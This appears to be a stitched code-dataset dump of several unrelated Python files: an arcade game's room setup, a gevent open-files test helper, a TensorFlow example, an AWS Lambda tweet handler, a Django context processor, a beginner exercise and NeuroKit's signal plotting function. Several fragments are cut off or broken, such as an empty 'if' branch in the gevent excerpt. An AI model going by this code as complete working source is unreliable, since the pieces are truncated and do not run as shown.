for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | 36.324219 | 124 | 0.614367 |
fe916e74f3d8c5dd73c18e07f1aa14f15ee3d8d0 | 4,869 | py | Python | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 10 | 2021-03-23T03:46:19.000Z | 2022-03-08T07:20:25.000Z | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 7 | 2021-05-21T16:51:48.000Z | 2022-03-12T00:50:26.000Z | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 4 | 2021-04-21T00:49:34.000Z | 2021-11-21T09:18:29.000Z | # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
else:
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
| 38.642857 | 139 | 0.657835 |
fe93e83fe7e8770b4f2c1e2cf97bec6cd0abb158 | 1,628 | py | Python | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 5 | 2016-07-27T08:25:17.000Z | 2022-02-07T19:41:45.000Z | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | null | null | null | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 1 | 2022-02-07T19:41:46.000Z | 2022-02-07T19:41:46.000Z | '''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res
| 34.638298 | 116 | 0.673219 |
fe97b6953c22bb335b56638721adf4a720e34f5f | 2,922 | py | Python | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
| 33.204545 | 142 | 0.589322 |
fe97e4775b3fbd1abdf826717d17fd4e96f2144c | 353 | py | Python | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 21 | 2018-04-18T17:58:12.000Z | 2022-01-19T12:41:01.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 4 | 2018-04-24T11:04:15.000Z | 2022-02-03T18:35:21.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 7 | 2018-03-04T16:03:44.000Z | 2022-02-03T15:50:39.000Z | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| 23.533333 | 60 | 0.708215 |
fe98a505a6e3e05977900098d14a4c4efb60654a | 502 | py | Python | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | ## Highest Score
# Don't change the code below
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# Don't change the code above
# Write your code below this row
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | 26.421053 | 66 | 0.721116 |
fe9913a9a0d00104117bbc4e7f42cf9196b11854 | 8,791 | py | Python | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 43 | 2021-10-15T01:11:36.000Z | 2022-03-31T02:05:41.000Z | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 5 | 2021-12-09T08:07:22.000Z | 2022-03-02T07:34:34.000Z | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 7 | 2021-11-23T01:15:36.000Z | 2022-03-07T16:30:30.000Z | import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
if __name__ == "__main__":
main()
| 42.674757 | 176 | 0.657604 |
fe995885e2a5bd2844820d9d11a66c6433d1051b | 1,166 | py | Python | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 13 | 2020-09-02T09:05:08.000Z | 2022-03-12T02:43:24.000Z | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 1,998 | 2020-06-15T11:46:10.000Z | 2022-03-24T22:12:41.000Z | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 8 | 2020-09-29T06:50:35.000Z | 2021-06-14T03:30:52.000Z | from jumpscale.core import exceptions
| 13.55814 | 62 | 0.732419 |
fe99a748e2fcbf259f6611afd0ca5930032c99b6 | 5,703 | py | Python | neurokit2/signal/signal_plot.py | gutierrezps/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | 1 | 2022-03-20T21:09:34.000Z | 2022-03-20T21:09:34.000Z | neurokit2/signal/signal_plot.py | Lei-I-Zhang/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | null | null | null | neurokit2/signal/signal_plot.py | Lei-I-Zhang/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| 33.946429 | 109 | 0.57198 |